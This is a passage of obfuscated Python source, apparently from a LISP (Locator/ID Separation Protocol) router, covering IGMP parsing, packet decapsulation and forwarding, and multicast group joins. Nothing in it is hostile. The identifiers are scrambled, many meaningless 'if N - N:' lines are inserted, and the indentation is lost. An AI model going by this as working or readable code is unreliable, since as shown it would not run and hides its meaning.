lisp . lprint ( "IGMPv3 {} (*, {})" . format ( lisp . bold ( OoOoO0oOOooo , False ) ,
lisp . bold ( oO00OoOo , False ) ) )
if 72 - 72: II11iiII . II11iiII - oOoO0oo0OOOo
if 48 - 48: OoO0O00 - Oo + OoO0O00 - oo * i11iIiiIii . i1I1ii1II1iII
if 35 - 35: oooO0oo0oOOOO . O0 + OoO0O00 + II11iiII + i1IIi
if 65 - 65: O0 * oo / oo . oOo0O0Ooo
if 87 - 87: II111iiii * oOoO0oo0OOOo % OoO0O00 * OoO0O00
for O0O in range ( ooooO ) :
if ( len ( O0oo0O0 ) < IIiI11 ) : return
oO0O0 = struct . unpack ( oO00O , O0oo0O0 [ : IIiI11 ] ) [ 0 ]
II1iIi11 . address = socket . ntohl ( oO0O0 )
OOOOO0 = II1iIi11 . print_address_no_iid ( )
OOOoo . append ( [ OOOOO0 , oO00OoOo , ii1 ] )
lisp . lprint ( "{} ({}, {})" . format ( OoOoO0oOOooo ,
lisp . green ( OOOOO0 , False ) , lisp . bold ( oO00OoOo , False ) ) )
O0oo0O0 = O0oo0O0 [ IIiI11 : : ]
if 79 - 79: II111iiii - Oo . i1IIi + O0 % O0 * oo
if 7 - 7: i1IIi + II11iiII % i1I1ii1II1iII / Ooo00oOo00o + i1IIi
if 41 - 41: o0000oOoOoO0o + i11iIiiIii / oooO0oo0oOOOO % oOoO0oo0OOOo
if 22 - 22: oOo0O0Ooo % Ooo00oOo00o * o0000oOoOoO0o - oOoO0oo0OOOo + Ooo00oOo00o - OoO0O00
if 15 - 15: II11iiII
if 31 - 31: i1I1ii1II1iII / i1IIi . ooOO00oOo
if 83 - 83: iiiiIi11i / iIii1I11I1II1 + i1IIi / i1I1ii1II1iII
if 47 - 47: iiiiIi11i + OoooooooOO . II111iiii . i1I1ii1II1iII
if ( len ( OOOoo ) != 0 ) :
iIIIiIii ( Oo0o0000o0o0 , OOOoo )
if 66 - 66: Oo * oOo0O0Ooo
return
if 2 - 2: iiiiIi11i . o0oo0o * OoO0O00 + O0 - OoOO0ooOOoo0O * iIii1I11I1II1
if 12 - 12: Ooo00oOo00o * o0oo0o % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: OoO0O00 - OoOO0ooOOoo0O
if 24 - 24: OoooooooOO . ooOO00oOo * II111iiii
if 59 - 59: o0oo0o + ooOO00oOo / II11iiII
if 97 - 97: OoO0O00 * i1I1ii1II1iII % Oo . i1I1ii1II1iII - o0oo0o - II11iiII
if 79 - 79: oo - Oo
if 37 - 37: oooO0oo0oOOOO . OoO0O00 * OoO0O00 * II111iiii * O0
def o00O ( parms , not_used , packet ) :
global I11
if 88 - 88: i11iIiiIii + i1I1ii1II1iII * oOo0O0Ooo * i1I1ii1II1iII + OoOO0ooOOoo0O
O0OOO00OooO = parms [ 0 ]
oOo0oooo00o = parms [ 1 ]
if 64 - 64: ooOO00oOo . oo - OoooooooOO . Oo - i1I1ii1II1iII
if 77 - 77: o0000oOoOoO0o % oOo0O0Ooo / II111iiii % i1I1ii1II1iII % OoooooooOO % ooOO00oOo
if 19 - 19: oooO0oo0oOOOO * o0oo0o / iiiiIi11i * o0oo0o - OoooooooOO * OoOO0ooOOoo0O
if 17 - 17: II111iiii + OoO0O00 . o0oo0o
if 12 - 12: o0oo0o + II11iiII + OoOO0ooOOoo0O . oooO0oo0oOOOO / o0000oOoOoO0o
if 29 - 29: oooO0oo0oOOOO . Oo - II111iiii
if ( lisp . lisp_is_macos ( ) == False ) :
ooooO0 = 4 if O0OOO00OooO == "lo0" else 16
packet = packet [ ooooO0 : : ]
if 37 - 37: i11iIiiIii + oo . II11iiII % OoOO0ooOOoo0O % OoOO0ooOOoo0O
if 26 - 26: O0
if 34 - 34: Oo * o0oo0o
if 97 - 97: i11iIiiIii % iiiiIi11i / OoO0O00 / OoO0O00
if 97 - 97: II111iiii - o0oo0o - iIii1I11I1II1 * oo
ooo = struct . unpack ( "B" , packet [ 9 ] ) [ 0 ]
if ( ooo == 2 ) :
o0oO0Oo ( packet )
return
if 88 - 88: o0oo0o % oooO0oo0oOOOO / o0000oOoOoO0o - oo / oo * Oo
if 77 - 77: oooO0oo0oOOOO
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / OoOO0ooOOoo0O / Oo + o0oo0o
if 5 - 5: oOo0O0Ooo % i1I1ii1II1iII + oooO0oo0oOOOO
if 13 - 13: oooO0oo0oOOOO
ii1II1II = packet
packet , II1iIi11 , i11i11II11i , II1Ii1I1i = lisp . lisp_is_rloc_probe ( packet , 0 )
if ( ii1II1II != packet ) :
if ( II1iIi11 == None ) : return
lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , II1iIi11 , i11i11II11i , II1Ii1I1i )
return
if 74 - 74: oOoO0oo0OOOo * i11iIiiIii / oo - O0 . Oo
if 39 - 39: Oo / O0 * oooO0oo0oOOOO
if 17 - 17: o0000oOoOoO0o / iIii1I11I1II1 - ooOO00oOo + oo % II11iiII
if 14 - 14: Ooo00oOo00o % oooO0oo0oOOOO + oOoO0oo0OOOo + ooOO00oOo
if 76 - 76: ooOO00oOo - i11iIiiIii + oOo0O0Ooo + II11iiII / OoooooooOO
if 50 - 50: II111iiii - o0oo0o + iIii1I11I1II1 + iIii1I11I1II1
if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + oOoO0oo0OOOo - II111iiii
iiIiiIi1 = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
if ( iiIiiIi1 == lisp . LISP_DATA_PORT ) : return
packet = lisp . lisp_reassemble ( packet )
if ( packet == None ) : return
if 30 - 30: II11iiII + II111iiii - oooO0oo0oOOOO * OoooooooOO
packet = lisp . lisp_packet ( packet )
I1iIiiiI1 = packet . decode ( True , I11 , lisp . lisp_decap_stats )
if ( I1iIiiiI1 == None ) : return
if 87 - 87: oOo0O0Ooo - Oo - II11iiII + OoO0O00 % iIii1I11I1II1 / i11iIiiIii
if 12 - 12: Oo
if 86 - 86: iiiiIi11i - ooOO00oOo
if 63 - 63: oo / oOo0O0Ooo + OoooooooOO . OoOO0ooOOoo0O . Oo
packet . print_packet ( "Receive" , True )
if 48 - 48: i1IIi - i1I1ii1II1iII - i11iIiiIii . OoOO0ooOOoo0O - i1I1ii1II1iII * OoOO0ooOOoo0O
if 60 - 60: oOo0O0Ooo / oOoO0oo0OOOo + II11iiII - i1I1ii1II1iII
if 49 - 49: ooOO00oOo - O0 / ooOO00oOo * oOo0O0Ooo + o0oo0o
if 35 - 35: II111iiii . oo / i1IIi / oo * iiiiIi11i
if 85 - 85: II111iiii . Oo % II11iiII % OoOO0ooOOoo0O
if 80 - 80: iiiiIi11i * OoOO0ooOOoo0O / iIii1I11I1II1 % iiiiIi11i / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . OoO0O00 * i1I1ii1II1iII . i11iIiiIii * O0
if 44 - 44: i1IIi . oo / i11iIiiIii + oooO0oo0oOOOO
if ( lisp . lisp_decent_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 27 - 27: II11iiII
II1iIi11 = packet . inner_source . print_address_no_iid ( )
packet . strip_outer_headers ( )
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , II1iIi11 , iiIiiIi1 )
lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
return
if 52 - 52: o0oo0o % oOo0O0Ooo + iIii1I11I1II1 * iiiiIi11i . o0000oOoOoO0o
if 95 - 95: iIii1I11I1II1 . oooO0oo0oOOOO - OoooooooOO * ooOO00oOo / Ooo00oOo00o
if 74 - 74: iiiiIi11i
if 34 - 34: i1I1ii1II1iII
if 44 - 44: i1IIi % oo % Ooo00oOo00o
if 9 - 9: OoO0O00 % OoooooooOO - o0000oOoOoO0o
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 43 - 43: ooOO00oOo % ooOO00oOo
if 46 - 46: OoO0O00 % iIii1I11I1II1 . i1I1ii1II1iII . O0 * Oo / OoooooooOO
if 7 - 7: iiiiIi11i - O0 * OoOO0ooOOoo0O - Ooo00oOo00o - II111iiii
if 41 - 41: oo - o0oo0o % II111iiii . o0oo0o - OoOO0ooOOoo0O
if 45 - 45: o0000oOoOoO0o - II11iiII
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 70 - 70: ooOO00oOo % oo / oo . OoOO0ooOOoo0O % Oo . II111iiii
if 10 - 10: o0000oOoOoO0o - i11iIiiIii . oOoO0oo0OOOo % i1IIi
if 78 - 78: iIii1I11I1II1 * OoO0O00 . OoO0O00 - II11iiII . iIii1I11I1II1
if 30 - 30: Oo + Oo % oooO0oo0oOOOO - Ooo00oOo00o - oOoO0oo0OOOo
packet . strip_outer_headers ( )
i111IiiI1Ii = lisp . bold ( "Forward" , False )
if 72 - 72: O0 . oOo0O0Ooo * OoO0O00 + oOoO0oo0OOOo - Ooo00oOo00o
if 40 - 40: ooOO00oOo + ooOO00oOo
if 94 - 94: i1I1ii1II1iII * iIii1I11I1II1 . OoOO0ooOOoo0O
if 13 - 13: iIii1I11I1II1 * oOo0O0Ooo / o0oo0o % Oo + iiiiIi11i
iiiI1iI1 = packet . inner_dest . is_mac ( )
if ( iiiI1iI1 ) :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
i111IiiI1Ii = lisp . bold ( "Bridge" , False )
elif ( packet . inner_version == 4 ) :
packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 15 - 15: oooO0oo0oOOOO . i1IIi * oOo0O0Ooo % iIii1I11I1II1
if 35 - 35: oOoO0oo0OOOo + o0oo0o - oOo0O0Ooo % iiiiIi11i % Ooo00oOo00o % oOo0O0Ooo
if 45 - 45: oo * II11iiII % ooOO00oOo
if 24 - 24: Oo - OoOO0ooOOoo0O * iiiiIi11i
if 87 - 87: o0000oOoOoO0o - oOoO0oo0OOOo % oOoO0oo0OOOo . iiiiIi11i / oOoO0oo0OOOo
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
oo000 = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( oo000 ) :
oo000 . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if 6 - 6: oOo0O0Ooo / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
return
if 79 - 79: oooO0oo0oOOOO % ooOO00oOo
if 81 - 81: i11iIiiIii + i11iIiiIii * ooOO00oOo + oooO0oo0oOOOO
if 32 - 32: O0 . OoooooooOO
if 15 - 15: oo . ooOO00oOo
if 17 - 17: i11iIiiIii / OoO0O00 . ooOO00oOo / oo
if 38 - 38: i1IIi . oOoO0oo0OOOo % o0000oOoOoO0o + iIii1I11I1II1 + O0
oOOoo0Oo = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 47 - 47: ooOO00oOo + oooO0oo0oOOOO / II111iiii
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( i111IiiI1Ii , lisp . green ( oOOoo0Oo , False ) ,
# i1IIi % o0000oOoOoO0o - ooOO00oOo / iiiiIi11i . Oo / OoO0O00
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 99 - 99: ooOO00oOo - oOo0O0Ooo * oOo0O0Ooo . II111iiii % Oo
if 1 - 1: oOoO0oo0OOOo + OoO0O00 * iiiiIi11i + Ooo00oOo00o - OoOO0ooOOoo0O . oOoO0oo0OOOo
if 31 - 31: iIii1I11I1II1 . II111iiii - ooOO00oOo
if 62 - 62: II11iiII / II111iiii + oOo0O0Ooo % Oo / oOo0O0Ooo + oOoO0oo0OOOo
if 2 - 2: i11iIiiIii - o0oo0o + ooOO00oOo % OoOO0ooOOoo0O * o0000oOoOoO0o
if ( iiiI1iI1 ) :
packet . bridge_l2_packet ( packet . inner_dest , oo000 )
return
if 54 - 54: O0 - i1I1ii1II1iII . II11iiII % i1I1ii1II1iII + i1I1ii1II1iII
if 36 - 36: II11iiII % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . OoO0O00 * iiiiIi11i . OoOO0ooOOoo0O / i1IIi
if 50 - 50: o0oo0o / i1IIi % OoooooooOO
if 83 - 83: oOoO0oo0OOOo * oOoO0oo0OOOo + II11iiII
if 57 - 57: O0 - O0 . oOoO0oo0OOOo / Ooo00oOo00o / o0000oOoOoO0o
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
return
if 20 - 20: II11iiII * II111iiii - oOo0O0Ooo - iiiiIi11i * o0oo0o
if 6 - 6: Oo + II11iiII / OoO0O00 + oooO0oo0oOOOO % II111iiii / ooOO00oOo
if 45 - 45: OoooooooOO
if 9 - 9: OoOO0ooOOoo0O . ooOO00oOo * i1IIi . OoooooooOO
if 32 - 32: oOo0O0Ooo . oOoO0oo0OOOo % oo - II111iiii
iiI111 = packet . get_raw_socket ( )
if ( iiI111 == None ) : iiI111 = oOo0oooo00o
if 62 - 62: oOoO0oo0OOOo - O0 . oo . O0 * iIii1I11I1II1
if 92 - 92: iiiiIi11i / II11iiII . oOoO0oo0OOOo
if 30 - 30: o0000oOoOoO0o . oOoO0oo0OOOo / II11iiII
if 2 - 2: oooO0oo0oOOOO % oo - o0oo0o
packet . send_packet ( iiI111 , packet . inner_dest )
return
if 79 - 79: OoooooooOO / oOoO0oo0OOOo . O0
if 79 - 79: iiiiIi11i - II111iiii
if 43 - 43: i1IIi + O0 % ooOO00oOo / o0000oOoOoO0o * oo
if 89 - 89: oo . OoO0O00 + oOoO0oo0OOOo . O0 % Ooo00oOo00o
if 84 - 84: OoooooooOO + o0oo0o / oo % II11iiII % oOoO0oo0OOOo * oo
if 58 - 58: ooOO00oOo - oOo0O0Ooo . i11iIiiIii % i11iIiiIii / i1IIi / iiiiIi11i
if 24 - 24: oo * i1IIi % Oo / O0 + i11iIiiIii
if 12 - 12: oOoO0oo0OOOo / o0000oOoOoO0o
if 5 - 5: OoooooooOO
if 18 - 18: oo % OoooooooOO - i1I1ii1II1iII . i11iIiiIii * OoO0O00 % o0000oOoOoO0o
if 12 - 12: i1IIi / II11iiII % Oo * oooO0oo0oOOOO * O0 * iIii1I11I1II1
def OOOO ( lisp_raw_socket , packet , source ) :
global I11 , Oo0o0000o0o0
if 98 - 98: iiiiIi11i . OoooooooOO
if 54 - 54: O0 / oooO0oo0oOOOO % Oo * i1IIi * O0
if 48 - 48: Ooo00oOo00o . iiiiIi11i % oOo0O0Ooo - oOo0O0Ooo
if 33 - 33: OoOO0ooOOoo0O % II111iiii + ooOO00oOo
OoIi1I1I = packet
packet = lisp . lisp_packet ( packet [ 8 : : ] )
if ( packet . lisp_header . decode ( OoIi1I1I ) == False ) : return
if 56 - 56: O0
if 45 - 45: oOo0O0Ooo - ooOO00oOo - oOo0O0Ooo
if 41 - 41: OoO0O00 / i1IIi / OoO0O00 - i1I1ii1II1iII . Ooo00oOo00o
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / oo / i1I1ii1II1iII
if 69 - 69: Oo % Oo
if 76 - 76: i11iIiiIii * i1I1ii1II1iII / ooOO00oOo % oOoO0oo0OOOo + II11iiII
packet . outer_source = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , source ,
lisp . LISP_IPV4_HOST_MASK_LEN , 0 )
if 48 - 48: iIii1I11I1II1 % i1IIi + oOo0O0Ooo % Ooo00oOo00o
I1iIiiiI1 = packet . decode ( False , I11 ,
lisp . lisp_decap_stats )
if ( I1iIiiiI1 == None ) : return
if 79 - 79: oOo0O0Ooo % oo % o0000oOoOoO0o / i1IIi % ooOO00oOo
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * i1I1ii1II1iII
if 84 - 84: II11iiII + o0000oOoOoO0o + Ooo00oOo00o
if 33 - 33: o0000oOoOoO0o
if 93 - 93: Oo
if 34 - 34: iiiiIi11i - Oo * OoO0O00 / Ooo00oOo00o
if 19 - 19: oOoO0oo0OOOo
if ( lisp . lisp_flow_logging ) : packet . log_flow ( False )
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - oOo0O0Ooo % O0 / II111iiii * i1IIi
packet . print_packet ( "Kernel-decap" , False )
lisp . dprint ( packet . lisp_header . print_header ( " " ) )
if 66 - 66: O0
if 52 - 52: ooOO00oOo * OoooooooOO
if 12 - 12: O0 + oooO0oo0oOOOO * i1IIi . ooOO00oOo
if 71 - 71: o0oo0o - Ooo00oOo00o - II11iiII
if 28 - 28: iIii1I11I1II1
if 7 - 7: Ooo00oOo00o % oooO0oo0oOOOO * oOo0O0Ooo
if 58 - 58: oooO0oo0oOOOO / OoOO0ooOOoo0O + II111iiii % i1I1ii1II1iII - OoooooooOO
if 25 - 25: oOo0O0Ooo % OoooooooOO * OoO0O00 - i1IIi * II111iiii * iiiiIi11i
if ( lisp . lisp_decent_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 30 - 30: OoOO0ooOOoo0O % oOo0O0Ooo / oOoO0oo0OOOo * O0 * o0000oOoOoO0o . oo
iiIiiIi1 = packet . udp_sport
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , source , iiIiiIi1 )
lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
return
if 46 - 46: oOo0O0Ooo - O0
if 70 - 70: OoOO0ooOOoo0O + OoO0O00 * iIii1I11I1II1 . oo * OoOO0ooOOoo0O
if 49 - 49: Ooo00oOo00o
if 25 - 25: i1I1ii1II1iII . OoooooooOO * iIii1I11I1II1 . Ooo00oOo00o / O0 + o0000oOoOoO0o
if 68 - 68: OoO0O00
if 22 - 22: II11iiII
if 22 - 22: i1I1ii1II1iII * OoOO0ooOOoo0O - OoO0O00 * O0 / i11iIiiIii
if 78 - 78: OoO0O00 * O0 / Oo + OoooooooOO + II11iiII
if 23 - 23: i1I1ii1II1iII % OoooooooOO / iIii1I11I1II1 + oOoO0oo0OOOo / i1IIi / Ooo00oOo00o
if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
packet = packet . packet
II1Ii1I1i = - 1
if ( lisp . lisp_is_rloc_probe_request ( packet [ 28 ] ) ) :
II1Ii1I1i = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
if 94 - 94: i1IIi
packet = packet [ 28 : : ]
lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , source , 0 , II1Ii1I1i )
return
if 36 - 36: oo + OoO0O00
if 46 - 46: i1I1ii1II1iII
if 65 - 65: i1IIi . oOoO0oo0OOOo / Oo
if 11 - 11: oooO0oo0oOOOO * Oo / Oo - II11iiII
if 68 - 68: oo % oooO0oo0oOOOO - oooO0oo0oOOOO / oo + oOoO0oo0OOOo - OoO0O00
if 65 - 65: Oo - i1IIi
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 62 - 62: OoOO0ooOOoo0O / iiiiIi11i % OoO0O00 . OoooooooOO / i11iIiiIii / o0oo0o
if 60 - 60: oo % iiiiIi11i / Ooo00oOo00o % iiiiIi11i * i11iIiiIii / i1I1ii1II1iII
if 34 - 34: o0oo0o - II11iiII
if 25 - 25: iiiiIi11i % oo + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 10 - 10: o0oo0o % O0 / oo % OoOO0ooOOoo0O
if 25 - 25: II111iiii / ooOO00oOo
if 64 - 64: O0 % Oo
if 40 - 40: Ooo00oOo00o + OoOO0ooOOoo0O
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
oo000 = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( oo000 ) :
oo000 . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if 77 - 77: i11iIiiIii % oooO0oo0oOOOO + o0oo0o % OoooooooOO - OoOO0ooOOoo0O
if 26 - 26: OoO0O00 + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: oOo0O0Ooo % o0oo0o * OoO0O00 * oOo0O0Ooo
if 65 - 65: i11iIiiIii + OoO0O00 * OoooooooOO - ooOO00oOo
oOOoo0Oo = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 26 - 26: Ooo00oOo00o % II11iiII + II11iiII % OoOO0ooOOoo0O * i11iIiiIii / i1I1ii1II1iII
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( lisp . bold ( "NAT-Forward" , False ) , lisp . green ( oOOoo0Oo , False ) ,
# II11iiII % II111iiii - II11iiII + II111iiii
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 61 - 61: i11iIiiIii * iiiiIi11i % OoO0O00 * o0oo0o - OoooooooOO - ooOO00oOo
if 83 - 83: Oo / II11iiII
if 39 - 39: oooO0oo0oOOOO + OoOO0ooOOoo0O
if 9 - 9: oo % OoOO0ooOOoo0O . OoO0O00 * oo
if 99 - 99: O0 . Ooo00oOo00o % OoOO0ooOOoo0O - OoO0O00 / OoOO0ooOOoo0O
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
return
if 20 - 20: oOo0O0Ooo * i1I1ii1II1iII
if 19 - 19: OoooooooOO
if 76 - 76: ooOO00oOo * iiiiIi11i
if 63 - 63: II111iiii . II111iiii + oOoO0oo0OOOo + II11iiII + O0 . o0000oOoOoO0o
if 1 - 1: O0 * i11iIiiIii - Oo - o0000oOoOoO0o
iiI111 = packet . get_raw_socket ( )
if ( iiI111 == None ) : iiI111 = lisp_raw_socket
if 94 - 94: ooOO00oOo + oooO0oo0oOOOO + Oo
if 82 - 82: OoO0O00 - OoO0O00 . iIii1I11I1II1 / II11iiII + oooO0oo0oOOOO % iIii1I11I1II1
if 61 - 61: II11iiII / OoO0O00 % II11iiII - ooOO00oOo + Oo / Oo
if 82 - 82: OoO0O00
packet . send_packet ( iiI111 , packet . inner_dest )
return
if 5 - 5: ooOO00oOo / ooOO00oOo - O0 - o0oo0o + o0oo0o
if 99 - 99: OoOO0ooOOoo0O * OoooooooOO / Ooo00oOo00o . oooO0oo0oOOOO - iIii1I11I1II1 - o0000oOoOoO0o
if 31 - 31: oooO0oo0oOOOO - ooOO00oOo / II11iiII . i1IIi / o0000oOoOoO0o
if 66 - 66: ooOO00oOo
if 72 - 72: o0oo0o
if 91 - 91: II111iiii / oooO0oo0oOOOO + iIii1I11I1II1 . OoOO0ooOOoo0O - O0
if 70 - 70: o0000oOoOoO0o * iiiiIi11i - OoOO0ooOOoo0O + OoO0O00 % oOoO0oo0OOOo - oooO0oo0oOOOO
if 81 - 81: O0 . O0
def OoO00OooO0 ( group , joinleave ) :
OoOo00 = None
for o0OO0oOO0O0 in lisp . lisp_group_mapping_list . values ( ) :
O00OOOo0 = OoO ( group , o0OO0oOO0O0 )
if ( O00OOOo0 == - 1 ) : continue
if ( OoOo00 == None or O00OOOo0 > OoOo00 . mask_len ) : OoOo00 = o0OO0oOO0O0
if 98 - 98: II11iiII + o0000oOoOoO0o
if ( OoOo00 == None ) : return
if 52 - 52: OoO0O00 / oOo0O0Ooo - o0oo0o . i1I1ii1II1iII
iiI11Ii1i = [ ]
for o0O00oOoOO in OoOo00 . sources :
iiI11Ii1i . append ( [ o0O00oOoOO , group , joinleave ] )
if 100 - 100: i1I1ii1II1iII + OoOO0ooOOoo0O + Oo + i1I1ii1II1iII / i1IIi
if 74 - 74: O0 % OoooooooOO * OoO0O00 + II11iiII * i1I1ii1II1iII
iIIIiIii ( Oo0o0000o0o0 , iiI11Ii1i )
return
if 100 - 100: II11iiII + o0000oOoOoO0o * Ooo00oOo00o + II111iiii
if 70 - 70: OoO0O00 * iIii1I11I1II1
if 76 - 76: i1I1ii1II1iII % oOo0O0Ooo % iIii1I11I1II1 . II11iiII
if 30 - 30: i1IIi
if 75 - 75: OoOO0ooOOoo0O . II11iiII - iIii1I11I1II1 * ooOO00oOo * i1I1ii1II1iII
if 93 - 93: Oo
if 18 - 18: Oo
if 66 - 66: iiiiIi11i * i11iIiiIii + oOo0O0Ooo / II11iiII
if 96 - 96: II11iiII + II11iiII % oooO0oo0oOOOO % II11iiII
if 28 - 28: iIii1I11I1II1 + oOo0O0Ooo . Ooo00oOo00o % i11iIiiIii
if 58 - 58: OoOO0ooOOoo0O / OoooooooOO % iiiiIi11i + ooOO00oOo
if 58 - 58: O0
if 91 - 91: i1I1ii1II1iII / oOoO0oo0OOOo . i1I1ii1II1iII - Ooo00oOo00o + oOoO0oo0OOOo
if 72 - 72: o0000oOoOoO0o . oooO0oo0oOOOO * oOoO0oo0OOOo / oOoO0oo0OOOo / i1I1ii1II1iII
if 13 - 13: i1IIi
if 17 - 17: i11iIiiIii * Ooo00oOo00o * Ooo00oOo00o + ooOO00oOo
def o0O0O ( ) :
global Oo0o0000o0o0
if 45 - 45: Ooo00oOo00o % OoO0O00 * i1IIi - O0
lisp . lisp_set_exception ( )
if 82 - 82: II111iiii / i1I1ii1II1iII
OOoO = socket . htonl
i1IiiI = [ OOoO ( 0x46000020 ) , OOoO ( 0x9fe60000 ) , OOoO ( 0x0102d7cc ) ,
OOoO ( 0x0acfc15a ) , OOoO ( 0xe00000fb ) , OOoO ( 0x94040000 ) ]
if 70 - 70: OoOO0ooOOoo0O . II11iiII * OoO0O00 / II11iiII
OO0 = ""
for Oo0OoOo in i1IiiI : OO0 += struct . pack ( "I" , Oo0OoOo )
if 13 - 13: Ooo00oOo00o
if 7 - 7: oo + oooO0oo0oOOOO / i11iIiiIii / OoO0O00
if 97 - 97: o0oo0o . OoOO0ooOOoo0O / oo
if 83 - 83: OoOO0ooOOoo0O - oOoO0oo0OOOo * iiiiIi11i
if 90 - 90: OoO0O00 * oo
while ( True ) :
OO0OooOo = commands . getoutput ( "ls join-*" ) . replace ( "join-" , "" )
OO0OooOo = OO0OooOo . split ( "\n" )
if 13 - 13: O0 % Oo % OoOO0ooOOoo0O
for i1111IIiii1 in OO0OooOo :
if ( lisp . lisp_valid_address_format ( "address" , i1111IIiii1 ) == False ) :
continue
if 25 - 25: OoooooooOO % o0000oOoOoO0o * II111iiii - ooOO00oOo
if 95 - 95: oo % o0oo0o * oo + O0 . o0oo0o % OoooooooOO
II11II1I = ( i1111IIiii1 . find ( ":" ) != - 1 )
if 52 - 52: II11iiII * iiiiIi11i + OoOO0ooOOoo0O * OoOO0ooOOoo0O % i1IIi % OoOO0ooOOoo0O
if 96 - 96: Ooo00oOo00o * iiiiIi11i - II11iiII * Ooo00oOo00o * i1IIi
if 8 - 8: Oo - OoO0O00 + iIii1I11I1II1 + i1IIi * o0000oOoOoO0o - iIii1I11I1II1
if 30 - 30: OoOO0ooOOoo0O / oOoO0oo0OOOo
iI1iIIIIIiIi1 = os . path . exists ( "leave-{}" . format ( i1111IIiii1 ) )
lisp . lprint ( "Internal {} group {}" . format ( "leaving" if iI1iIIIIIiIi1 else "joining" , i1111IIiii1 ) )
if 19 - 19: oOo0O0Ooo . Ooo00oOo00o . OoooooooOO
if 13 - 13: II11iiII . OoO0O00 / II111iiii
if 43 - 43: iIii1I11I1II1 % ooOO00oOo
if 84 - 84: OoO0O00
if 44 - 44: OoooooooOO * i11iIiiIii / OoO0O00
if ( II11II1I ) :
if ( i1111IIiii1 . lower ( ) . find ( "ff02:" ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
if 75 - 75: OoooooooOO . II11iiII + ooOO00oOo / o0000oOoOoO0o - oo % o0000oOoOoO0o
OoO00OooO0 ( i1111IIiii1 , ( iI1iIIIIIiIi1 == False ) )
else :
O0OooooO0o0O0 = OO0
if ( iI1iIIIIIiIi1 ) :
O0OooooO0o0O0 += struct . pack ( "I" , OOoO ( 0x17000000 ) )
else :
O0OooooO0o0O0 += struct . pack ( "I" , OOoO ( 0x16000000 ) )
if 74 - 74: oOo0O0Ooo / i1IIi % OoooooooOO
if 52 - 52: oooO0oo0oOOOO % Oo
I111 = i1111IIiii1 . split ( "." )
i1I1ii11i1Iii = int ( I111 [ 0 ] ) << 24
i1I1ii11i1Iii += int ( I111 [ 1 ] ) << 16
i1I1ii11i1Iii += int ( I111 [ 2 ] ) << 8
i1I1ii11i1Iii += int ( I111 [ 3 ] )
O0OooooO0o0O0 += struct . pack ( "I" , OOoO ( i1I1ii11i1Iii ) )
o0oO0Oo ( O0OooooO0o0O0 )
time . sleep ( .100 )
if 51 - 51: oOoO0oo0OOOo * iiiiIi11i
if 23 - 23: i11iIiiIii
time . sleep ( 10 )
if 100 - 100: iiiiIi11i + O0 . oo + i1IIi - oOo0O0Ooo + Ooo00oOo00o
return
if 65 - 65: II111iiii / OoO0O00
if 42 - 42: i11iIiiIii . O0
if 75 - 75: o0oo0o + iIii1I11I1II1
if 19 - 19: oo + i11iIiiIii . oooO0oo0oOOOO - OoOO0ooOOoo0O / o0000oOoOoO0o + Ooo00oOo00o
if 38 - 38: OoO0O00 / iIii1I11I1II1 * iIii1I11I1II1 % oOoO0oo0OOOo
if 92 - 92: OoOO0ooOOoo0O / O0 * oo - OoOO0ooOOoo0O
